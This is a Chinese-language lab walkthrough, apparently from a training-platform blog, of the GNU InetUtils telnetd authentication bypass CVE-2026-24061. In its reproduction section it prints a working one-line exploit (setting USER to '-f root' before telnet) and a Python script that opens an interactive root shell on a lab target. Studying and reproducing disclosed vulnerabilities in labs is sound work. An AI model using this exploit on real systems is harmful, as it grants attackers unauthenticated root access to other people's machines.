CVE漏洞系列之—GNU InetUtils telnetd 远程认证绕过漏洞(CVE-2026-24061)
2026/7/8 11:55:24 网站建设 项目流程

简介

CVE-2026-24061是GNU InetUtils中telnetd服务的一个认证绕过漏洞,允许攻击者无需任何凭证直接获取目标系统的root权限。该漏洞已于2026年初被公开披露,影响范围广泛,全球超过20万台设备暴露风险。

漏洞核心:攻击者通过Telnet连接时,可发送特制的USER环境变量值-f root,利用Linux登录程序的-f(跳过认证)参数,直接以root身份登录系统。

影响版本:GNU InetUtils 1.9.3至2.7版本均受影响

漏洞评级:CVSS评分9.8(严重级别)

环境搭建

首先我们打开NextCyber网络安全实战演练平台,在“课程中心”页面,选择“新的”标签筛选出新上课程,选择“inetutils”这个课程,免费解锁复现。

在课程的左边点击“跳转到问题”自动下拉到底部,点击右下角的“启动靶机实例”,开启靶机进行漏洞复现。

漏洞复现

靶机启动后,开放23端口,即telnet服务,我们使用nmap工具进行全端口扫描:

对服务进行-sV扫描,查看服务版本信息:

方法一

我们直接执行以下命令获取目标shell:

USER="-f root" telnet -a 10.22.39.203

方法二

我们使用以下python脚本进行漏洞利用:

#!/usr/bin/env python3 import shutil import pexpect import argparse def check_telnet(): if not shutil.which("telnet"): print("[ERROR] telnet client not found. Please install 'telnet'.") sys.exit(1) def main(): check_telnet() parser = argparse.ArgumentParser(description="CVE-2026-24061 telnetd exploit interactive shell") parser.add_argument("-t", "--target", required=True, help="Target IP or hostname") parser.add_argument("-p", "--port", type=int, default=23, help="Telnet port") parser.add_argument("-T", "--timeout", type=int, default=10, help="Session timeout (seconds)") args = parser.parse_args() ip = args.target port = args.port timeout = args.timeout print(f"[+] Connecting to {ip}:{port}") try: child = pexpect.spawn(f"env USER='-f root' telnet -a {ip} {port}", timeout=timeout) child.interact() except Exception as e: print(f"[ERROR] {ip}:{port}: {e}") if __name__ == "__main__": main()

可以看到,漏洞利用成功,能直接获取目标的root权限。

靶机体验

如果你也想体验这个漏洞的复现过程,欢迎登陆我们的 Nextcyber 网络安全实战演练平台,一键启动靶机,无需复杂环境搭建!随时随地进行靶机练习!

有学习需求或想获取更多资料的,欢迎站内私信交流!

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询